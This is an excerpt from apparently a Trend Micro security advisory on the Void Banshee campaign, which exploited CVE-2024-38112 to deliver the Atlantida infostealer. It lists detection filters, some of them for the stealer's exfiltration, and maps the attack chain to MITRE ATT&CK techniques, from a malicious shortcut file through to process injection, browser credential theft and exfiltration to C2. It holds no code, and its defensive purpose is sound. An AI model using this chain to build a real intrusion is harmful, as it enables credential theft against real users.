The following protections exist to detect and protect Trend customers against the zero-day CVE-2024-38112 (ZDI-CAN-24433) and Atlantida malware exfiltration attempts.

Trend Vision One Model
- Microsoft Windows Remote Code Execution Vulnerability (ZDI-CAN-24433)
- Svchost Executes Iexplorer

Trend Micro Cloud One - Network Security & TippingPoint Filters
- 44417 - ZDI-CAN-24433: Zero Day Initiative Vulnerability (Microsoft Windows)
- 44453 - Trojan.Win32.AtlantidaStealer.A Runtime Detection (Geo Information)
- 44454 - Trojan.Win32.AtlantidaStealer.A Runtime Detection (Exfil Data)

Trend Vision One Endpoint Security, Trend Cloud One - Workload and Endpoint Security, Deep Security and Vulnerability Protection IPS Rules
- 1012075 - Microsoft Windows MSHTML Platform Remote Code Execution Vulnerability Over SMB (CVE-2024-38112)
- 1012074 - Microsoft Windows MSHTML Platform Remote Code Execution Vulnerability (CVE-2024-38112)

MITRE ATT&CK techniques

Tactic | Technique | Context
Initial Access | T1566.002 - Phishing: Spearphishing Link | Victim downloads malicious zip archive
Execution | T1204.002 - User Execution: Malicious File | Victim executes Internet Shortcut (.URL) file that exploits CVE-2024-38112
Defense Evasion | T1218 - System Binary Proxy Execution | MHTML handler and x-usc directive open compromised site in Internet Explorer
Compromise Infrastructure | T1584.004 - Compromise Infrastructure: Server | Victim is redirected to compromised site which downloads a malicious HTML Application (.HTA)
Execution | T1204.002 - User Execution: Malicious File | Victim opens HTA file
Execution | T1059.005 - Command and Scripting Interpreter: Visual Basic | HTA application executes VBScript
Defense Evasion | T1027 - Obfuscated Files or Information | Obfuscated VBScript
Compromise Infrastructure | T1584.004 - Compromise Infrastructure: Server | VBScript downloads malicious PowerShell script
Execution | T1059.001 - Command and Scripting Interpreter: PowerShell | PowerShell script executes
Compromise Infrastructure | T1584.004 - Compromise Infrastructure: Server | PowerShell script downloads malicious .NET loader
Defense Evasion | T1027 - Obfuscated Files or Information | Obfuscated .NET loader (.NET Reactor)
Defense Evasion | T1055 - Process Injection | LoadToBadXml injects the decrypted payload into a suspended RegAsm.exe process
Execution | T1218.009 - System Binary Proxy Execution: Regsvcs/Regasm | RegAsm.exe is abused as the host for the injected payload
Collection | T1560.001 - Archive via Utility | Atlantida compresses stolen data into a ZIP archive for exfiltration
Collection | T1005 - Data from Local System | Atlantida collects sensitive files from the local system
Discovery | T1082 - System Information Discovery | Atlantida collects hardware information from the victim
Collection | T1555.003 - Credentials from Password Stores: Credentials from Web Browsers | Atlantida collects sensitive data from web browsers, including Chrome extension data
Collection | T1113 - Screen Capture | Atlantida captures screenshots of the victim machine
Exfiltration | T1041 - Exfiltration Over C2 Channel | Void Banshee exfiltrates stolen data to the C&C server

Indicators of Compromise (IOCs)

Download the full list of IOCs here.
Acknowledgments

The Zero Day Initiative would like to thank the following Trenders for their contributions in ensuring that Trend Micro customers were protected from this zero-day attack pre-patching: Scott Graham, Mohamad Mokbel, Abdelrahman Esmail, Simon Dulude, Senthil Nathan Sankar, Amit Kumar, and a special thanks to the content writers and marketing teams for helping with this research.

Source: https://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html